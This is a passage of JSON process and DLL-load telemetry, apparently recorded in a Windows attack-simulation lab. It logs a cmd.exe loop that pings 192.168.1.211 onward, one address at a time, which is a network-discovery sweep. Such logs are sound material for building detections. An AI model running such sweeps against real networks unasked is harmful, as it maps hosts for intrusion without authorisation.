"{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": 
"C:\\Windows\\System32\\winnsi.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573016980000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "event_type": "process", - "pid": 5616, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573021830000, - "unique_pid": "{42FC7E13-CBB5-5C05-0000-0010119B5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.211", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6068, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - 
"event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - 
"pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573021980000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "event_type": "process", - "pid": 6068, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573026990000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-0010919D5301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.212", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5044, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - 
"image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5044, - "process_name": 
"PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573027140000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "event_type": "process", - "pid": 5044, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573031830000, - "unique_pid": "{42FC7E13-CBB6-5C05-0000-001001A05301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.213", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3148, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", 
- "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": 
"C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573031980000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "event_type": "process", - "pid": 3148, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573036990000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-001084A25301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.214", 
- "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6784, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573037130000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - 
"timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573037140000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "event_type": "process", - 
"pid": 6784, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573041830000, - "unique_pid": "{42FC7E13-CBB7-5C05-0000-0010F3A45301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.215", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5856, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - 
"unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - "image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - 
"image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573041980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "event_type": "process", - "pid": 5856, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573046830000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-001070A75301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.216", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1144, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": 
"{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "IPHLPAPI.DLL", - "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "winnsi.dll", - "image_path": "C:\\Windows\\System32\\winnsi.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "nsi.dll", - 
"image_path": "C:\\Windows\\System32\\nsi.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "image_load", - "image_name": "mswsock.dll", - "image_path": "C:\\Windows\\System32\\mswsock.dll", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573046980000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "event_type": "process", - "pid": 1144, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "terminate", - "timestamp": 131883573051830000, - "unique_pid": "{42FC7E13-CBB8-5C05-0000-0010E4A95301}" - }, - { - "command_line": "ping -n 1 -w 100 192.168.1.217", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6556, - "ppid": 7328, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "subtype": "create", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}", - "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "PING.EXE", - "image_path": "C:\\Windows\\System32\\PING.EXE", - "pid": 6556, - "process_name": "PING.EXE", - "process_path": "C:\\Windows\\System32\\PING.EXE", - "timestamp": 131883573051980000, - "unique_pid": "{42FC7E13-CBB9-5C05-0000-001063AC5301}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6556, - "process_name": 